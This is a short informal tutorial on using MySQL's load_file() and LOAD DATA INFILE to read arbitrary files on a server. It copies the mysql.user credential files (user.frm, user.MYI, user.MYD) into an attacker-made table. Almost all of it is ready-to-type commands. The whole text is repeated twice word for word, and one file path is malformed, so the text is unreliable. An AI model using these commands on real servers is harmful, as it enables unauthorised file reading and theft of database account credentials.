Want to try hack your server via mysql?
Ok, you can 'print' any file in the server to the monitor (running mysql) using load_file() function, in mysql.
Go to your command prompt.
Type in the following command:
mysql>select load_file('c:/dns.txt');
dns.txt can be any file in your server
By using load data infile function, you can transfer any file, or database content to a newly created database.
mysql>load data infile 'c/dns.txt' into table table_name;
Ok.. so you want to copy a table to your newly created table?
mysql> create database db_ghimau;
mysql> use db_ghimau;
mysql> create table tbl_ghimau (filename varchar(20),content longblob);
Then copy the data!
mysql> insert into tbl_ghimau values ('user.frm',load_file('c:\\MySQL\\data\\mysql\\user.frm'));
mysql> insert into tbl_ghimau values ('user.MYI',load_file('c:\\MySQL\\data\\mysql\\user.MYI'));
mysql> insert into tbl_ghimau values ('user.MYD',load_file('c:\\MySQL\\data\\mysql\\user.MYD'));
Want to try hack your server via mysql?
Ok, you can 'print' any file in the server to the monitor (running mysql) using load_file() function, in mysql.
Go to your command prompt.
Type in the following command:
mysql>select load_file('c:/dns.txt');
dns.txt can be any file in your server
By using load data infile function, you can transfer any file, or database content to a newly created database.
mysql>load data infile 'c/dns.txt' into table table_name;
Ok.. so you want to copy a table to your newly created table?
mysql> create database db_ghimau;
mysql> use db_ghimau;
mysql> create table tbl_ghimau (filename varchar(20),content longblob);
Then copy the data!
mysql> insert into tbl_ghimau values ('user.frm',load_file('c:\\MySQL\\data\\mysql\\user.frm'));
mysql> insert into tbl_ghimau values ('user.MYI',load_file('c:\\MySQL\\data\\mysql\\user.MYI'));
mysql> insert into tbl_ghimau values ('user.MYD',load_file('c:\\MySQL\\data\\mysql\\user.MYD'));